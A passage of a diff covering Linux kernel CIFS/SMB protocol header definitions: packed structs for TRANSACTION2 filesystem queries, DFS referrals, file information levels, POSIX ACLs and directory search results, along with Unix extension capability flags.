+-typedef struct smb_com_transaction2_qfsi_req {
+-	struct smb_hdr hdr;	/* wct = 14+ */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__le16 InformationLevel;
+-} __attribute__((packed)) TRANSACTION2_QFSI_REQ;
+-
+-typedef struct smb_com_transaction_qfsi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 + SetupCount */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u8 Pad;	/* may be three bytes? *//* followed by data area */
+-} __attribute__((packed)) TRANSACTION2_QFSI_RSP;
+-
+-typedef struct whoami_rsp_data { /* Query level 0x202 */
+-	__u32 flags; /* 0 = Authenticated user 1 = GUEST */
+-	__u32 mask; /* which flags bits server understands ie 0x0001 */
+-	__u64 unix_user_id;
+-	__u64 unix_user_gid;
+-	__u32 number_of_supplementary_gids; /* may be zero */
+-	__u32 number_of_sids; /* may be zero */
+-	__u32 length_of_sid_array; /* in bytes - may be zero */
+-	__u32 pad; /* reserved - MBZ */
+-	/* __u64 gid_array[0]; */  /* may be empty */
+-	/* __u8 * psid_list */  /* may be empty */
+-} __attribute__((packed)) WHOAMI_RSP_DATA;
+-
+-/* SETFSInfo Levels */
+-#define SMB_SET_CIFS_UNIX_INFO    0x200
+-/* level 0x203 is defined above in list of QFS info levels */
+-/* #define SMB_REQUEST_TRANSPORT_ENCRYPTION 0x203 */
+-
+-/* Level 0x200 request structure follows */
+-typedef struct smb_com_transaction2_setfsi_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;	/* 4 */
+-	__le16 ParameterOffset;
+-	__le16 DataCount;	/* 12 */
+-	__le16 DataOffset;
+-	__u8 SetupCount;	/* one */
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* TRANS2_SET_FS_INFORMATION */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16 FileNum;		/* Parameters start. */
+-	__le16 InformationLevel;/* Parameters end. */
+-	__le16 ClientUnixMajor; /* Data start. */
+-	__le16 ClientUnixMinor;
+-	__le64 ClientUnixCap;   /* Data end */
+-} __attribute__((packed)) TRANSACTION2_SETFSI_REQ;
+-
+-/* level 0x203 request structure follows */
+-typedef struct smb_com_transaction2_setfs_enc_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;	/* 4 */
+-	__le16 ParameterOffset;
+-	__le16 DataCount;	/* 12 */
+-	__le16 DataOffset;
+-	__u8 SetupCount;	/* one */
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* TRANS2_SET_FS_INFORMATION */
+-	__le16 ByteCount;
+-	__u8 Pad;
+-	__u16  Reserved4;	/* Parameters start. */
+-	__le16 InformationLevel;/* Parameters end. */
+-	/* NTLMSSP Blob, Data start. */
+-} __attribute__((packed)) TRANSACTION2_SETFSI_ENC_REQ;
+-
+-/* response for setfsinfo levels 0x200 and 0x203 */
+-typedef struct smb_com_transaction2_setfsi_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-} __attribute__((packed)) TRANSACTION2_SETFSI_RSP;
+-
+-typedef struct smb_com_transaction2_get_dfs_refer_req {
+-	struct smb_hdr hdr;	/* wct = 15 */
+-	__le16 TotalParameterCount;
+-	__le16 TotalDataCount;
+-	__le16 MaxParameterCount;
+-	__le16 MaxDataCount;
+-	__u8 MaxSetupCount;
+-	__u8 Reserved;
+-	__le16 Flags;
+-	__le32 Timeout;
+-	__u16 Reserved2;
+-	__le16 ParameterCount;
+-	__le16 ParameterOffset;
+-	__le16 DataCount;
+-	__le16 DataOffset;
+-	__u8 SetupCount;
+-	__u8 Reserved3;
+-	__le16 SubCommand;	/* one setup word */
+-	__le16 ByteCount;
+-	__u8 Pad[3];		/* Win2K has sent 0x0F01 (max response length
+-				   perhaps?) followed by one byte pad - doesn't
+-				   seem to matter though */
+-	__le16 MaxReferralLevel;
+-	char RequestFileName[1];
+-} __attribute__((packed)) TRANSACTION2_GET_DFS_REFER_REQ;
+-
+-#define DFS_VERSION cpu_to_le16(0x0003)
+-
+-/* DFS server target type */
+-#define DFS_TYPE_LINK 0x0000  /* also for sysvol targets */
+-#define DFS_TYPE_ROOT 0x0001
+-
+-/* Referral Entry Flags */
+-#define DFS_NAME_LIST_REF 0x0200 /* set for domain or DC referral responses */
+-#define DFS_TARGET_SET_BOUNDARY 0x0400 /* only valid with version 4 dfs req */
+-
+-typedef struct dfs_referral_level_3 { /* version 4 is same, + one flag bit */
+-	__le16 VersionNumber;  /* must be 3 or 4 */
+-	__le16 Size;
+-	__le16 ServerType; /* 0x0001 = root targets; 0x0000 = link targets */
+-	__le16 ReferralEntryFlags;
+-	__le32 TimeToLive;
+-	__le16 DfsPathOffset;
+-	__le16 DfsAlternatePathOffset;
+-	__le16 NetworkAddressOffset; /* offset of the link target */
+-	__u8   ServiceSiteGuid[16];  /* MBZ, ignored */
+-} __attribute__((packed)) REFERRAL3;
+-
+-struct get_dfs_referral_rsp {
+-	__le16 PathConsumed;
+-	__le16 NumberOfReferrals;
+-	__le32 DFSFlags;
+-	REFERRAL3 referrals[1];	/* array of level 3 dfs_referral structures */
+-	/* followed by the strings pointed to by the referral structures */
+-} __packed;
+-
+-typedef struct smb_com_transaction_get_dfs_refer_rsp {
+-	struct smb_hdr hdr;	/* wct = 10 */
+-	struct trans2_resp t2;
+-	__u16 ByteCount;
+-	__u8 Pad;
+-	struct get_dfs_referral_rsp dfs_data;
+-} __packed TRANSACTION2_GET_DFS_REFER_RSP;
+-
+-/* DFS Flags */
+-#define DFSREF_REFERRAL_SERVER  0x00000001 /* all targets are DFS roots */
+-#define DFSREF_STORAGE_SERVER   0x00000002 /* no further ref requests needed */
+-#define DFSREF_TARGET_FAILBACK  0x00000004 /* only for DFS referral version 4 */
+-
+-/*
+- ************************************************************************
+- * All structs for everything above the SMB PDUs themselves
+- * (such as the T2 level specific data) go here
+- ************************************************************************
+- */
+-
+-/*
+- * Information on a server
+- */
+-
+-struct serverInfo {
+-	char name[16];
+-	unsigned char versionMajor;
+-	unsigned char versionMinor;
+-	unsigned long type;
+-	unsigned int commentOffset;
+-} __attribute__((packed));
+-
+-/*
+- * The following structure is the format of the data returned on a NetShareEnum
+- * with level "90" (x5A)
+- */
+-
+-struct shareInfo {
+-	char shareName[13];
+-	char pad;
+-	unsigned short type;
+-	unsigned int commentOffset;
+-} __attribute__((packed));
+-
+-struct aliasInfo {
+-	char aliasName[9];
+-	char pad;
+-	unsigned int commentOffset;
+-	unsigned char type[2];
+-} __attribute__((packed));
+-
+-struct aliasInfo92 {
+-	int aliasNameOffset;
+-	int serverNameOffset;
+-	int shareNameOffset;
+-} __attribute__((packed));
+-
+-typedef struct {
+-	__le64 TotalAllocationUnits;
+-	__le64 FreeAllocationUnits;
+-	__le32 SectorsPerAllocationUnit;
+-	__le32 BytesPerSector;
+-} __attribute__((packed)) FILE_SYSTEM_INFO;	/* size info, level 0x103 */
+-
+-typedef struct {
+-	__le32 fsid;
+-	__le32 SectorsPerAllocationUnit;
+-	__le32 TotalAllocationUnits;
+-	__le32 FreeAllocationUnits;
+-	__le16  BytesPerSector;
+-} __attribute__((packed)) FILE_SYSTEM_ALLOC_INFO;
+-
+-typedef struct {
+-	__le16 MajorVersionNumber;
+-	__le16 MinorVersionNumber;
+-	__le64 Capability;
+-} __attribute__((packed)) FILE_SYSTEM_UNIX_INFO; /* Unix extension level 0x200*/
+-
+-/* Version numbers for CIFS UNIX major and minor. */
+-#define CIFS_UNIX_MAJOR_VERSION 1
+-#define CIFS_UNIX_MINOR_VERSION 0
+-
+-/* Linux/Unix extensions capability flags */
+-#define CIFS_UNIX_FCNTL_CAP             0x00000001 /* support for fcntl locks */
+-#define CIFS_UNIX_POSIX_ACL_CAP         0x00000002 /* support getfacl/setfacl */
+-#define CIFS_UNIX_XATTR_CAP             0x00000004 /* support new namespace   */
+-#define CIFS_UNIX_EXTATTR_CAP           0x00000008 /* support chattr/chflag   */
+-#define CIFS_UNIX_POSIX_PATHNAMES_CAP   0x00000010 /* Allow POSIX path chars  */
+-#define CIFS_UNIX_POSIX_PATH_OPS_CAP    0x00000020 /* Allow new POSIX path based
+-						      calls including posix open
+-						      and posix unlink */
+-#define CIFS_UNIX_LARGE_READ_CAP        0x00000040 /* support reads >128K (up
+-						      to 0xFFFF00 */
+-#define CIFS_UNIX_LARGE_WRITE_CAP       0x00000080
+-#define CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP 0x00000100 /* can do SPNEGO crypt */
+-#define CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP  0x00000200 /* must do  */
+-#define CIFS_UNIX_PROXY_CAP             0x00000400 /* Proxy cap: 0xACE ioctl and
+-						      QFS PROXY call */
+-#ifdef CONFIG_CIFS_POSIX
+-/* presumably don't need the 0x20 POSIX_PATH_OPS_CAP since we never send
+-   LockingX instead of posix locking call on unix sess (and we do not expect
+-   LockingX to use different (ie Windows) semantics than posix locking on
+-   the same session (if WINE needs to do this later, we can add this cap
+-   back in later */
+-/* #define CIFS_UNIX_CAP_MASK              0x000000fb */
+-#define CIFS_UNIX_CAP_MASK              0x000003db
+-#else
+-#define CIFS_UNIX_CAP_MASK              0x00000013
+-#endif /* CONFIG_CIFS_POSIX */
+-
+-
+-#define CIFS_POSIX_EXTENSIONS           0x00000010 /* support for new QFSInfo */
+-
+-typedef struct {
+-	/* For undefined recommended transfer size return -1 in that field */
+-	__le32 OptimalTransferSize;  /* bsize on some os, iosize on other os */
+-	__le32 BlockSize;
+-    /* The next three fields are in terms of the block size.
+-	(above). If block size is unknown, 4096 would be a
+-	reasonable block size for a server to report.
+-	Note that returning the blocks/blocksavail removes need
+-	to make a second call (to QFSInfo level 0x103 to get this info.
+-	UserBlockAvail is typically less than or equal to BlocksAvail,
+-	if no distinction is made return the same value in each */
+-	__le64 TotalBlocks;
+-	__le64 BlocksAvail;       /* bfree */
+-	__le64 UserBlocksAvail;   /* bavail */
+-    /* For undefined Node fields or FSID return -1 */
+-	__le64 TotalFileNodes;
+-	__le64 FreeFileNodes;
+-	__le64 FileSysIdentifier;   /* fsid */
+-	/* NB Namelen comes from FILE_SYSTEM_ATTRIBUTE_INFO call */
+-	/* NB flags can come from FILE_SYSTEM_DEVICE_INFO call   */
+-} __attribute__((packed)) FILE_SYSTEM_POSIX_INFO;
+-
+-/* DeviceType Flags */
+-#define FILE_DEVICE_CD_ROM              0x00000002
+-#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003
+-#define FILE_DEVICE_DFS                 0x00000006
+-#define FILE_DEVICE_DISK                0x00000007
+-#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008
+-#define FILE_DEVICE_FILE_SYSTEM         0x00000009
+-#define FILE_DEVICE_NAMED_PIPE          0x00000011
+-#define FILE_DEVICE_NETWORK             0x00000012
+-#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014
+-#define FILE_DEVICE_NULL                0x00000015
+-#define FILE_DEVICE_PARALLEL_PORT       0x00000016
+-#define FILE_DEVICE_PRINTER             0x00000018
+-#define FILE_DEVICE_SERIAL_PORT         0x0000001b
+-#define FILE_DEVICE_STREAMS             0x0000001e
+-#define FILE_DEVICE_TAPE                0x0000001f
+-#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020
+-#define FILE_DEVICE_VIRTUAL_DISK        0x00000024
+-#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028
+-
+-/* Device Characteristics */
+-#define FILE_REMOVABLE_MEDIA			0x00000001
+-#define FILE_READ_ONLY_DEVICE			0x00000002
+-#define FILE_FLOPPY_DISKETTE			0x00000004
+-#define FILE_WRITE_ONCE_MEDIA			0x00000008
+-#define FILE_REMOTE_DEVICE			0x00000010
+-#define FILE_DEVICE_IS_MOUNTED			0x00000020
+-#define FILE_VIRTUAL_VOLUME			0x00000040
+-#define FILE_DEVICE_SECURE_OPEN			0x00000100
+-#define FILE_CHARACTERISTIC_TS_DEVICE		0x00001000
+-#define FILE_CHARACTERISTIC_WEBDAV_DEVICE	0x00002000
+-#define FILE_PORTABLE_DEVICE			0x00004000
+-#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL 0x00020000
+-
+-typedef struct {
+-	__le32 DeviceType;
+-	__le32 DeviceCharacteristics;
+-} __attribute__((packed)) FILE_SYSTEM_DEVICE_INFO; /* device info level 0x104 */
+-
+-/* minimum includes first three fields, and empty FS Name */
+-#define MIN_FS_ATTR_INFO_SIZE 12
+-
+-
+-/* List of FileSystemAttributes - see 2.5.1 of MS-FSCC */
+-#define FILE_SUPPORTS_SPARSE_VDL	0x10000000 /* faster nonsparse extend */
+-#define FILE_SUPPORTS_BLOCK_REFCOUNTING	0x08000000 /* allow ioctl dup extents */
+-#define FILE_SUPPORT_INTEGRITY_STREAMS	0x04000000
+-#define FILE_SUPPORTS_USN_JOURNAL	0x02000000
+-#define FILE_SUPPORTS_OPEN_BY_FILE_ID	0x01000000
+-#define FILE_SUPPORTS_EXTENDED_ATTRIBUTES 0x00800000
+-#define FILE_SUPPORTS_HARD_LINKS	0x00400000
+-#define FILE_SUPPORTS_TRANSACTIONS	0x00200000
+-#define FILE_SEQUENTIAL_WRITE_ONCE	0x00100000
+-#define FILE_READ_ONLY_VOLUME		0x00080000
+-#define FILE_NAMED_STREAMS		0x00040000
+-#define FILE_SUPPORTS_ENCRYPTION	0x00020000
+-#define FILE_SUPPORTS_OBJECT_IDS	0x00010000
+-#define FILE_VOLUME_IS_COMPRESSED	0x00008000
+-#define FILE_SUPPORTS_REMOTE_STORAGE	0x00000100
+-#define FILE_SUPPORTS_REPARSE_POINTS	0x00000080
+-#define FILE_SUPPORTS_SPARSE_FILES	0x00000040
+-#define FILE_VOLUME_QUOTAS		0x00000020
+-#define FILE_FILE_COMPRESSION		0x00000010
+-#define FILE_PERSISTENT_ACLS		0x00000008
+-#define FILE_UNICODE_ON_DISK		0x00000004
+-#define FILE_CASE_PRESERVED_NAMES	0x00000002
+-#define FILE_CASE_SENSITIVE_SEARCH	0x00000001
+-typedef struct {
+-	__le32 Attributes;
+-	__le32 MaxPathNameComponentLength;
+-	__le32 FileSystemNameLen;
+-	char FileSystemName[52]; /* do not have to save this - get subset? */
+-} __attribute__((packed)) FILE_SYSTEM_ATTRIBUTE_INFO;
+-
+-/******************************************************************************/
+-/* QueryFileInfo/QueryPathinfo (also for SetPath/SetFile) data buffer formats */
+-/******************************************************************************/
+-typedef struct { /* data block encoding of response to level 263 QPathInfo */
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
+-	__u32 Pad1;
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;	/* size ie offset to first free byte in file */
+-	__le32 NumberOfLinks;	/* hard links */
+-	__u8 DeletePending;
+-	__u8 Directory;
+-	__u16 Pad2;
+-	__le64 IndexNumber;
+-	__le32 EASize;
+-	__le32 AccessFlags;
+-	__u64 IndexNumber1;
+-	__le64 CurrentByteOffset;
+-	__le32 Mode;
+-	__le32 AlignmentRequirement;
+-	__le32 FileNameLength;
+-	char FileName[1];
+-} __attribute__((packed)) FILE_ALL_INFO;	/* level 0x107 QPathInfo */
+-
+-typedef struct {
+-	__le64 AllocationSize;
+-	__le64 EndOfFile;	/* size ie offset to first free byte in file */
+-	__le32 NumberOfLinks;	/* hard links */
+-	__u8 DeletePending;
+-	__u8 Directory;
+-	__u16 Pad;
+-} __attribute__((packed)) FILE_STANDARD_INFO;	/* level 0x102 QPathInfo */
+-
+-
+-/* defines for enumerating possible values of the Unix type field below */
+-#define UNIX_FILE      0
+-#define UNIX_DIR       1
+-#define UNIX_SYMLINK   2
+-#define UNIX_CHARDEV   3
+-#define UNIX_BLOCKDEV  4
+-#define UNIX_FIFO      5
+-#define UNIX_SOCKET    6
+-typedef struct {
+-	__le64 EndOfFile;
+-	__le64 NumOfBytes;
+-	__le64 LastStatusChange; /*SNIA specs DCE time for the 3 time fields */
+-	__le64 LastAccessTime;
+-	__le64 LastModificationTime;
+-	__le64 Uid;
+-	__le64 Gid;
+-	__le32 Type;
+-	__le64 DevMajor;
+-	__le64 DevMinor;
+-	__le64 UniqueId;
+-	__le64 Permissions;
+-	__le64 Nlinks;
+-} __attribute__((packed)) FILE_UNIX_BASIC_INFO;	/* level 0x200 QPathInfo */
+-
+-typedef struct {
+-	char LinkDest[1];
+-} __attribute__((packed)) FILE_UNIX_LINK_INFO;	/* level 0x201 QPathInfo */
+-
+-/* The following three structures are needed only for
+-	setting time to NT4 and some older servers via
+-	the primitive DOS time format */
+-typedef struct {
+-	__u16 Day:5;
+-	__u16 Month:4;
+-	__u16 Year:7;
+-} __attribute__((packed)) SMB_DATE;
+-
+-typedef struct {
+-	__u16 TwoSeconds:5;
+-	__u16 Minutes:6;
+-	__u16 Hours:5;
+-} __attribute__((packed)) SMB_TIME;
+-
+-typedef struct {
+-	__le16 CreationDate; /* SMB Date see above */
+-	__le16 CreationTime; /* SMB Time */
+-	__le16 LastAccessDate;
+-	__le16 LastAccessTime;
+-	__le16 LastWriteDate;
+-	__le16 LastWriteTime;
+-	__le32 DataSize; /* File Size (EOF) */
+-	__le32 AllocationSize;
+-	__le16 Attributes; /* verify not u32 */
+-	__le32 EASize;
+-} __attribute__((packed)) FILE_INFO_STANDARD;  /* level 1 SetPath/FileInfo */
+-
+-typedef struct {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
+-	__u32 Pad;
+-} __attribute__((packed)) FILE_BASIC_INFO;	/* size info, level 0x101 */
+-
+-struct file_allocation_info {
+-	__le64 AllocationSize; /* Note old Samba srvr rounds this up too much */
+-} __attribute__((packed));	/* size used on disk, for level 0x103 for set,
+-				   0x105 for query */
+-
+-struct file_end_of_file_info {
+-	__le64 FileSize;		/* offset to end of file */
+-} __attribute__((packed)); /* size info, level 0x104 for set, 0x106 for query */
+-
+-struct file_alt_name_info {
+-	__u8   alt_name[1];
+-} __attribute__((packed));      /* level 0x0108 */
+-
+-struct file_stream_info {
+-	__le32 number_of_streams;  /* BB check sizes and verify location */
+-	/* followed by info on streams themselves
+-		u64 size;
+-		u64 allocation_size
+-		stream info */
+-};      /* level 0x109 */
+-
+-struct file_compression_info {
+-	__le64 compressed_size;
+-	__le16 format;
+-	__u8   unit_shift;
+-	__u8   ch_shift;
+-	__u8   cl_shift;
+-	__u8   pad[3];
+-} __attribute__((packed));      /* level 0x10b */
+-
+-/* POSIX ACL set/query path info structures */
+-#define CIFS_ACL_VERSION 1
+-struct cifs_posix_ace { /* access control entry (ACE) */
+-	__u8  cifs_e_tag;
+-	__u8  cifs_e_perm;
+-	__le64 cifs_uid; /* or gid */
+-} __attribute__((packed));
+-
+-struct cifs_posix_acl { /* access conrol list  (ACL) */
+-	__le16	version;
+-	__le16	access_entry_count;  /* access ACL - count of entries */
+-	__le16	default_entry_count; /* default ACL - count of entries */
+-	struct cifs_posix_ace ace_array[];
+-	/* followed by
+-	struct cifs_posix_ace default_ace_arraay[] */
+-} __attribute__((packed));  /* level 0x204 */
+-
+-/* types of access control entries already defined in posix_acl.h */
+-/* #define CIFS_POSIX_ACL_USER_OBJ	 0x01
+-#define CIFS_POSIX_ACL_USER      0x02
+-#define CIFS_POSIX_ACL_GROUP_OBJ 0x04
+-#define CIFS_POSIX_ACL_GROUP     0x08
+-#define CIFS_POSIX_ACL_MASK      0x10
+-#define CIFS_POSIX_ACL_OTHER     0x20 */
+-
+-/* types of perms */
+-/* #define CIFS_POSIX_ACL_EXECUTE   0x01
+-#define CIFS_POSIX_ACL_WRITE     0x02
+-#define CIFS_POSIX_ACL_READ	     0x04 */
+-
+-/* end of POSIX ACL definitions */
+-
+-/* POSIX Open Flags */
+-#define SMB_O_RDONLY 	 0x1
+-#define SMB_O_WRONLY 	0x2
+-#define SMB_O_RDWR 	0x4
+-#define SMB_O_CREAT 	0x10
+-#define SMB_O_EXCL 	0x20
+-#define SMB_O_TRUNC 	0x40
+-#define SMB_O_APPEND 	0x80
+-#define SMB_O_SYNC 	0x100
+-#define SMB_O_DIRECTORY 0x200
+-#define SMB_O_NOFOLLOW 	0x400
+-#define SMB_O_DIRECT 	0x800
+-
+-typedef struct {
+-	__le32 OpenFlags; /* same as NT CreateX */
+-	__le32 PosixOpenFlags;
+-	__le64 Permissions;
+-	__le16 Level; /* reply level requested (see QPathInfo levels) */
+-} __attribute__((packed)) OPEN_PSX_REQ; /* level 0x209 SetPathInfo data */
+-
+-typedef struct {
+-	__le16 OplockFlags;
+-	__u16 Fid;
+-	__le32 CreateAction;
+-	__le16 ReturnedLevel;
+-	__le16 Pad;
+-	/* struct following varies based on requested level */
+-} __attribute__((packed)) OPEN_PSX_RSP; /* level 0x209 SetPathInfo data */
+-
+-#define SMB_POSIX_UNLINK_FILE_TARGET		0
+-#define SMB_POSIX_UNLINK_DIRECTORY_TARGET	1
+-
+-struct unlink_psx_rq { /* level 0x20a SetPathInfo */
+-	__le16 type;
+-} __attribute__((packed));
+-
+-struct file_internal_info {
+-	__le64  UniqueId; /* inode number */
+-} __attribute__((packed));      /* level 0x3ee */
+-
+-struct file_mode_info {
+-	__le32	Mode;
+-} __attribute__((packed));      /* level 0x3f8 */
+-
+-struct file_attrib_tag {
+-	__le32 Attribute;
+-	__le32 ReparseTag;
+-} __attribute__((packed));      /* level 0x40b */
+-
+-
+-/********************************************************/
+-/*  FindFirst/FindNext transact2 data buffer formats    */
+-/********************************************************/
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 ResumeKey; /* as with FileIndex - no need to convert */
+-	FILE_UNIX_BASIC_INFO basic;
+-	char FileName[1];
+-} __attribute__((packed)) FILE_UNIX_INFO; /* level 0x202 */
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	char FileName[1];
+-} __attribute__((packed)) FILE_DIRECTORY_INFO;   /* level 0x101 FF resp data */
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* length of the xattrs */
+-	char FileName[1];
+-} __attribute__((packed)) FILE_FULL_DIRECTORY_INFO; /* level 0x102 rsp data */
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* EA size */
+-	__le32 Reserved;
+-	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
+-	char FileName[1];
+-} __attribute__((packed)) SEARCH_ID_FULL_DIR_INFO; /* level 0x105 FF rsp data */
+-
+-typedef struct {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* length of the xattrs */
+-	__u8   ShortNameLength;
+-	__u8   Reserved;
+-	__u8   ShortName[24];
+-	char FileName[1];
+-} __attribute__((packed)) FILE_BOTH_DIRECTORY_INFO; /* level 0x104 FFrsp data */
+-
+-typedef struct {
+-	__u32  ResumeKey;
+-	__le16 CreationDate; /* SMB Date */
+-	__le16 CreationTime; /* SMB Time */
+-	__le16 LastAccessDate;
+-	__le16 LastAccessTime;
+-	__le16 LastWriteDate;
+-	__le16 LastWriteTime;
+-	__le32 DataSize; /* File Size (EOF) */
+-	__le32 AllocationSize;
+-	__le16 Attributes; /* verify not u32 */
+-	__u8   FileNameLength;
+-	char FileName[1];
+-} __attribute__((packed)) FIND_FILE_STANDARD_INFO; /* level 0x1 FF resp data */
+-
+-
+-struct win_dev {
+-	unsigned char type[8]; /* IntxCHR or IntxBLK */
+-	__le64 major;
+-	__le64 minor;
+-} __attribute__((packed));
+-
+-struct gea {
+-	unsigned char name_len;
+-	char name[1];
+-} __attribute__((packed));
+-
+-struct gealist {
+-	unsigned long list_len;
+-	struct gea list[1];
+-} __attribute__((packed));
+-
+-struct fea {
+-	unsigned char EA_flags;
+-	__u8 name_len;
+-	__le16 value_len;
+-	char name[1];
+-	/* optionally followed by value */
+-} __attribute__((packed));
+-/* flags for _FEA.fEA */
+-#define FEA_NEEDEA         0x80	/* need EA bit */
+-
+-struct fealist {
+-	__le32 list_len;
+-	struct fea list[1];
+-} __attribute__((packed));
+-
+-/* used to hold an arbitrary blob of data */
+-struct data_blob {
+-	__u8 *data;
+-	size_t length;
+-	void (*free) (struct data_blob *data_blob);
+-} __attribute__((packed));
+-
+-
+-#ifdef CONFIG_CIFS_POSIX
+-/*
+-	For better POSIX semantics from Linux client, (even better
+-	than the existing CIFS Unix Extensions) we need updated PDUs for:
+-
+-	1) PosixCreateX - to set and return the mode, inode#, device info and
+-	perhaps add a CreateDevice - to create Pipes and other special .inodes
+-	Also note POSIX open flags
+-	2) Close - to return the last write time to do cache across close
+-		more safely
+-	3) FindFirst return unique inode number - what about resume key, two
+-	forms short (matches readdir) and full (enough info to cache inodes)
+-	4) Mkdir - set mode
+-
+-	And under consideration:
+-	5) FindClose2 (return nanosecond timestamp ??)
+-	6) Use nanosecond timestamps throughout all time fields if
+-	   corresponding attribute flag is set
+-	7) sendfile - handle based copy
+-
+-	what about fixing 64 bit alignment
+-
+-	There are also various legacy SMB/CIFS requests used as is
+-
+-	From existing Lanman and NTLM dialects:
+-	--------------------------------------
+-	NEGOTIATE
+-	SESSION_SETUP_ANDX (BB which?)
+-	TREE_CONNECT_ANDX (BB which wct?)
+-	TREE_DISCONNECT (BB add volume timestamp on response)
+-	LOGOFF_ANDX
+-	DELETE (note delete open file behavior)
+-	DELETE_DIRECTORY
+-	READ_AND_X
+-	WRITE_AND_X
+-	LOCKING_AND_X (note posix lock semantics)
+-	RENAME (note rename across dirs and open file rename posix behaviors)
+-	NT_RENAME (for hardlinks) Is this good enough for all features?
+-	FIND_CLOSE2
+-	TRANSACTION2 (18 cases)
+-		SMB_SET_FILE_END_OF_FILE_INFO2 SMB_SET_PATH_END_OF_FILE_INFO2
+-		(BB verify that never need to set allocation size)
+-		SMB_SET_FILE_BASIC_INFO2 (setting times - BB can it be done via
+-			 Unix ext?)
+-
+-	COPY (note support for copy across directories) - FUTURE, OPTIONAL
+-	setting/getting OS/2 EAs - FUTURE (BB can this handle
+-	setting Linux xattrs perfectly)         - OPTIONAL
+-	dnotify                                 - FUTURE, OPTIONAL
+-	quota                                   - FUTURE, OPTIONAL
+-
+-	Note that various requests implemented for NT interop such as
+-		NT_TRANSACT (IOCTL) QueryReparseInfo
+-	are unneeded to servers compliant with the CIFS POSIX extensions
+-
+-	From CIFS Unix Extensions:
+-	-------------------------
+-	T2 SET_PATH_INFO (SMB_SET_FILE_UNIX_LINK) for symlinks
+-	T2 SET_PATH_INFO (SMB_SET_FILE_BASIC_INFO2)
+-	T2 QUERY_PATH_INFO (SMB_QUERY_FILE_UNIX_LINK)
+-	T2 QUERY_PATH_INFO (SMB_QUERY_FILE_UNIX_BASIC)	BB check for missing
+-							inode fields
+-				Actually a need QUERY_FILE_UNIX_INFO
+-				since has inode num
+-				BB what about a) blksize/blkbits/blocks
+-							  b) i_version
+-							  c) i_rdev
+-							  d) notify mask?
+-							  e) generation
+-							  f) size_seqcount
+-	T2 FIND_FIRST/FIND_NEXT FIND_FILE_UNIX
+-	TRANS2_GET_DFS_REFERRAL		      - OPTIONAL but recommended
+-	T2_QFS_INFO QueryDevice/AttributeInfo - OPTIONAL
+- */
+-
+-/* xsymlink is a symlink format (used by MacOS) that can be used
+-   to save symlink info in a regular file when
+-   mounted to operating systems that do not
+-   support the cifs Unix extensions or EAs (for xattr
+-   based symlinks).  For such a file to be recognized
+-   as containing symlink data:
+-
+-   1) file size must be 1067,
+-   2) signature must begin file data,
+-   3) length field must be set to ASCII representation
